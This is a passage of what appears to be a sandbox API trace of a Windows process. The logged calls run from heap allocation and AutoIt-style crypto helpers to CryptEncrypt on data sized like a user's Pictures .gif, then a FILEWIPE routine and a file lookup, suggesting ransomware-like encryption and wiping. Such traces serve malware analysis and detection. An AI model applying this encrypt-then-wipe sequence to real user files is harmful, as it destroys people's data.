RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.183] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.184] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.184] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2d8 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.184] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.185] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.186] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0040.187] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0040.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0040.187] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.187] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.187] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.187] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.188] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.188] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.188] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.188] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.188] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.188] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.188] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.189] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x138c5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x138d0) returned 1 [0040.189] CharLowerBuffW (in: lpsz="byte[80081]", cchLength=0xb | out: lpsz="byte[80081]") returned 0xb [0040.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.190] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95c1a8*, pdwDataLen=0x6ae220*=0x138c5, dwBufLen=0x138d0 | out: pbData=0x95c1a8*, pdwDataLen=0x6ae220*=0x138d0) returned 1 [0040.191] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.200] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.200] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.201] CryptDestroyKey (hKey=0x7c2280) returned 1 [0040.201] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.201] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.201] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.201] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.201] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.202] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.202] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.202] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0040.205] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0040.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.205] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b4e0, ftCreationTime.dwHighDateTime=0x1d5b652, ftLastAccessTime.dwLowDateTime=0x33d385b0, ftLastAccessTime.dwHighDateTime=0x1d5b798, ftLastWriteTime.dwLowDateTime=0x33d385b0, ftLastWriteTime.dwHighDateTime=0x1d5b798, nFileSizeHigh=0x0, nFileSizeLow=0x138c5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="EN4vTZXy-xQnxDkqMy.gif", cAlternateFileName="EN4VTZ~1.GIF")) returned 0x7c2100 [0040.205] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0040.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) 